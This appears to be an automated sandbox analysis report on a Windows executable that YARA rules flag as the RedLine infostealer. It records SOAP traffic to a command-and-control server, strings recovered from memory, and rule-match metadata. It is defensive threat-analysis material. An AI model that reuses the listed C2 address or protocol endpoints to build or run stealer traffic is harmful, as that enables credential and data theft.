Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 45.137.22.249:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 45.137.22.249:55615Content-Length: 921956Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 45.137.22.249:55615Content-Length: 921948Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 104.26.13.31 104.26.13.31

Source: Joe Sandbox View

ASN Name: ROOTLAYERNETNL ROOTLAYERNETNL

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: unknown

HTTPS traffic detected: 104.26.13.31:443 -> 192.168.2.4:49720 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.249
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.249
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.249
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.249
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.249
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.249
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.249
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.249
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.249
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.249
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.249
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.249
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.249
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.249
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.249
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.249
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.249
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.249
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.249
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.249
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.249
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.249
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.249
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.249
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.249
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.249
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.249
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.249
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.249
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.249
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.249
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.249
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.249
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.249
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.249
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.249
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.249
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.249
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.249
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.249
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.249
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.249
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.249
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.249
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.249
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.249
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.249
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.249
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.249
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.249

Source: global traffic

HTTP traffic detected: GET /geoip HTTP/1.1Host: api.ip.sbConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: api.ip.sb

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 45.137.22.249:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: RegSvcs.exe, 00000002.00000002.1423005666.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1423005666.00000000030F9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1423005666.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.137.22.249:55615
Source: RegSvcs.exe, 00000002.00000002.1423005666.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.137.22.249:55615/
Source: RegSvcs.exe, 00000002.00000002.1423005666.0000000002E31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.137.22.249:55615t-
Source: RegSvcs.exe, 00000002.00000002.1423005666.00000000030F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: RegSvcs.exe, 00000002.00000002.1423005666.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: RegSvcs.exe, 00000002.00000002.1423005666.0000000002DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: RegSvcs.exe, 00000002.00000002.1423005666.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: RegSvcs.exe, 00000002.00000002.1423005666.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
Source: RegSvcs.exe, 00000002.00000002.1423005666.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: RegSvcs.exe, 00000002.00000002.1423005666.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 00000002.00000002.1423005666.0000000002DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: RegSvcs.exe, 00000002.00000002.1423005666.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/0
Source: RegSvcs.exe, 00000002.00000002.1423005666.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
Source: RegSvcs.exe, 00000002.00000002.1423005666.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
Source: RegSvcs.exe, 00000002.00000002.1423005666.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
Source: RegSvcs.exe, 00000002.00000002.1423005666.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
Source: RegSvcs.exe, 00000002.00000002.1423005666.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1423005666.0000000002EA9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1423005666.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1423005666.0000000002DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
Source: RegSvcs.exe, 00000002.00000002.1423005666.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
Source: RegSvcs.exe, 00000002.00000002.1423005666.00000000030F9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1423005666.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1423005666.0000000002DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
Source: RegSvcs.exe, 00000002.00000002.1423005666.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
Source: RegSvcs.exe, 00000002.00000002.1423005666.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
Source: RegSvcs.exe, 00000002.00000002.1423005666.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
Source: Z6ojPnRBp1.exe, 00000000.00000002.1247532414.00000000068B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Z6ojPnRBp1.exe, 00000000.00000002.1247532414.00000000068B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: Z6ojPnRBp1.exe, 00000000.00000002.1247532414.00000000068B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: Z6ojPnRBp1.exe, 00000000.00000002.1247532414.00000000068B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: Z6ojPnRBp1.exe, 00000000.00000002.1247532414.00000000068B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Z6ojPnRBp1.exe, 00000000.00000002.1247532414.00000000068B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Z6ojPnRBp1.exe, 00000000.00000002.1247532414.00000000068B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: Z6ojPnRBp1.exe, 00000000.00000002.1247532414.00000000068B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: Z6ojPnRBp1.exe, 00000000.00000002.1247532414.00000000068B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: Z6ojPnRBp1.exe, 00000000.00000002.1247532414.00000000068B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: Z6ojPnRBp1.exe, 00000000.00000002.1247532414.00000000068B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: Z6ojPnRBp1.exe, 00000000.00000002.1247532414.00000000068B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: Z6ojPnRBp1.exe, 00000000.00000002.1247532414.00000000068B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Z6ojPnRBp1.exe, 00000000.00000002.1247532414.00000000068B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Z6ojPnRBp1.exe, 00000000.00000002.1247532414.00000000068B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Z6ojPnRBp1.exe, 00000000.00000002.1247532414.00000000068B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Z6ojPnRBp1.exe, 00000000.00000002.1247532414.00000000068B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Z6ojPnRBp1.exe, 00000000.00000002.1247532414.00000000068B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: Z6ojPnRBp1.exe, 00000000.00000002.1247532414.00000000068B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: Z6ojPnRBp1.exe, 00000000.00000002.1247532414.00000000068B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: Z6ojPnRBp1.exe, 00000000.00000002.1247532414.00000000068B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: Z6ojPnRBp1.exe, 00000000.00000002.1247532414.00000000068B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: Z6ojPnRBp1.exe, 00000000.00000002.1247532414.00000000068B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: tmpA13A.tmp.2.dr	String found in binary or memory: https://ac.ecosia.org?q=
Source: Z6ojPnRBp1.exe, 00000000.00000002.1244401020.0000000003747000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1421293852.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: Z6ojPnRBp1.exe, 00000000.00000002.1244401020.0000000003747000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1421293852.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
Source: tmpA13A.tmp.2.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: tmpA15C.tmp.2.dr, tmp6AE6.tmp.2.dr, tmp6AF7.tmp.2.dr, tmpA13B.tmp.2.dr, tmp6AC5.tmp.2.dr, tmpA14C.tmp.2.dr, tmp6AD5.tmp.2.dr, tmp6AB4.tmp.2.dr, tmp33E2.tmp.2.dr, tmp6A94.tmp.2.dr, tmp33E3.tmp.2.dr, tmpA13A.tmp.2.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: tmpA15C.tmp.2.dr, tmp6AE6.tmp.2.dr, tmp6AF7.tmp.2.dr, tmpA13B.tmp.2.dr, tmp6AC5.tmp.2.dr, tmpA14C.tmp.2.dr, tmp6AD5.tmp.2.dr, tmp6AB4.tmp.2.dr, tmp33E2.tmp.2.dr, tmp6A94.tmp.2.dr, tmp33E3.tmp.2.dr, tmpA13A.tmp.2.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: tmpA13A.tmp.2.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: tmpA15C.tmp.2.dr, tmp6AE6.tmp.2.dr, tmp6AF7.tmp.2.dr, tmpA13B.tmp.2.dr, tmp6AC5.tmp.2.dr, tmpA14C.tmp.2.dr, tmp6AD5.tmp.2.dr, tmp6AB4.tmp.2.dr, tmp33E2.tmp.2.dr, tmp6A94.tmp.2.dr, tmp33E3.tmp.2.dr, tmpA13A.tmp.2.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: tmpA13A.tmp.2.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: tmpA13A.tmp.2.dr	String found in binary or memory: https://gemini.google.com/app?q=
Source: Z6ojPnRBp1.exe, 00000000.00000002.1244401020.0000000003747000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1421293852.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: tmpA15C.tmp.2.dr, tmp6AE6.tmp.2.dr, tmp6AF7.tmp.2.dr, tmpA13B.tmp.2.dr, tmp6AC5.tmp.2.dr, tmpA14C.tmp.2.dr, tmp6AD5.tmp.2.dr, tmp6AB4.tmp.2.dr, tmp33E2.tmp.2.dr, tmp6A94.tmp.2.dr, tmp33E3.tmp.2.dr, tmpA13A.tmp.2.dr	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: tmpA15C.tmp.2.dr, tmp6AE6.tmp.2.dr, tmp6AF7.tmp.2.dr, tmpA13B.tmp.2.dr, tmp6AC5.tmp.2.dr, tmpA14C.tmp.2.dr, tmp6AD5.tmp.2.dr, tmp6AB4.tmp.2.dr, tmp33E2.tmp.2.dr, tmp6A94.tmp.2.dr, tmp33E3.tmp.2.dr, tmpA13A.tmp.2.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.Z6ojPnRBp1.exe.3747aa0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.Z6ojPnRBp1.exe.3747aa0.1.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 0.2.Z6ojPnRBp1.exe.375f8c0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.Z6ojPnRBp1.exe.3747aa0.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.Z6ojPnRBp1.exe.375f8c0.3.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 0.2.Z6ojPnRBp1.exe.375f8c0.3.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.Z6ojPnRBp1.exe.375f8c0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.Z6ojPnRBp1.exe.375f8c0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 0.2.Z6ojPnRBp1.exe.375f8c0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.Z6ojPnRBp1.exe.3747aa0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.Z6ojPnRBp1.exe.3747aa0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 0.2.Z6ojPnRBp1.exe.3747aa0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000002.00000002.1421293852.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 00000000.00000002.1244401020.0000000003747000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: Z6ojPnRBp1.exe PID: 7556, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 7796, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown

Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Code function: 0_2_04AE448C	0_2_04AE448C
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Code function: 0_2_04AE5228	0_2_04AE5228
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Code function: 0_2_0709F4A0	0_2_0709F4A0
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Code function: 0_2_07090040	0_2_07090040
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Code function: 0_2_070939F7	0_2_070939F7
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Code function: 0_2_071CBA78	0_2_071CBA78
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Code function: 0_2_071EC388	0_2_071EC388
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Code function: 0_2_071EC37A	0_2_071EC37A
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Code function: 0_2_071ED872	0_2_071ED872
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Code function: 0_2_072E2B68	0_2_072E2B68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0126E7B0	2_2_0126E7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0126DC90	2_2_0126DC90

Source: Z6ojPnRBp1.exe

Static PE information: Resource name: RT_VERSION type: MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"

Source: Z6ojPnRBp1.exe, 00000000.00000002.1250763853.0000000007E40000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Z6ojPnRBp1.exe
Source: Z6ojPnRBp1.exe, 00000000.00000002.1242578546.0000000002777000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTL.dll" vs Z6ojPnRBp1.exe
Source: Z6ojPnRBp1.exe, 00000000.00000002.1242578546.0000000002723000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameImplosions.exe4 vs Z6ojPnRBp1.exe
Source: Z6ojPnRBp1.exe, 00000000.00000002.1249741073.00000000071A0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTL.dll" vs Z6ojPnRBp1.exe
Source: Z6ojPnRBp1.exe, 00000000.00000002.1244401020.0000000003747000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameImplosions.exe4 vs Z6ojPnRBp1.exe
Source: Z6ojPnRBp1.exe, 00000000.00000002.1244401020.0000000003747000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Z6ojPnRBp1.exe
Source: Z6ojPnRBp1.exe, 00000000.00000000.1179951761.0000000000386000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamezkuS.exe" vs Z6ojPnRBp1.exe
Source: Z6ojPnRBp1.exe, 00000000.00000002.1242192136.00000000009DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Z6ojPnRBp1.exe
Source: Z6ojPnRBp1.exe	Binary or memory string: OriginalFilenamezkuS.exe" vs Z6ojPnRBp1.exe

Source: Z6ojPnRBp1.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.Z6ojPnRBp1.exe.3747aa0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.Z6ojPnRBp1.exe.3747aa0.1.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 0.2.Z6ojPnRBp1.exe.375f8c0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.Z6ojPnRBp1.exe.3747aa0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.Z6ojPnRBp1.exe.375f8c0.3.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 0.2.Z6ojPnRBp1.exe.375f8c0.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.Z6ojPnRBp1.exe.375f8c0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.Z6ojPnRBp1.exe.375f8c0.3.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 0.2.Z6ojPnRBp1.exe.375f8c0.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.Z6ojPnRBp1.exe.3747aa0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.Z6ojPnRBp1.exe.3747aa0.1.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
